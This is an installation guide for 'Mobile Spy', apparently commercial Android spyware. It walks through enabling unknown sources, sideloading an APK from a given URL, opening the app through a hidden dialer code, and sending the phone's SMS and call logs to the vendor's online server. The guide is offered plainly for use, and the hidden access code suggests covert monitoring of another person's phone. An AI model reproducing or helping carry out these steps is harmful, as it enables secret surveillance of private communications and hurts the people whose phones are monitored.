Mobile Spy - Instructions for Android Spy Software Installation

Installation for Android Devices

Welcome to the installation page for your Android device. This guide assumes you have already made your account on the Mobile Spy server as described in the User Guide.

NOTE: The first build of Android does NOT include URL capturing. This will appear in second version.

After you have created your username and password, you should perform these steps below. You will NOT need to connect your phone to your computer to install.

1. On your device, click the Home key, then pull up your screen of icons. Go to Settings > Applications and enable the "Unknown Sources" box. Make sure the box has a green check mark.

2. On your device, go to Android Market and hit the MENU key and tap "Search". Then search for the free app "apkinstaller". Tap the "apkInstaller" entry and then tap the Install button at the bottom. Then, tap OK to finish the installation of apkInstaller.

3. Still inside Android Market, hit the MENU key and tap "Search". Then search for "crutch" and click to install the free app called "Download Crutch Lite". After the install of Mobile Spy in step 4, you can remove the two free apps inside Android Market without affecting Mobile Spy.

4. Next, open the web browser on your device by hitting the Home key and going to "Browser". Hit the "MENU" key and tap "Go". Then inside the address bar, type asd-ms.com/a2/ms.apk and tap "Go". All letters and symbols must be typed exactly as shown.

5. Click the Home button and pull up your icons screen. Look for "ApkInstaller" and tap it. Then inside ApkInstaller, go to the "Download" directory. Then tap the "ms.apk" entry and then tap "INSTALL". It will ask do you want to install with Download Crutch Lite or Package Installer. Choose Package Installer.

6. After the installation completes, YOU MUST REBOOT YOUR PHONE! This is imperative or you will receive an MMI error when attempting to open the interface below.

After you have rebooted your phone, go to Dialer. Enter the digits *12345# and then press the SEND button. The login screen should then appear. Enter your username/password EXACTLY as you did when you created it. Then click LOGIN.

IMPORTANT NOTES

To make changes to the user/password just dial the three digits again: *12345#

You can also go back into Android Market and uninstall the apkInstaller and Download Crutch Lite after installation of Mobile Spy. Removing these apps will not remove Mobile Spy.

You are now ready to monitor using Mobile Spy. Send some test SMS messages and calls. Logs will start showing in your online account after a few minutes. To check logs, go to this specific login page to login from any Internet browser: https://www.mobilespylogs.com.
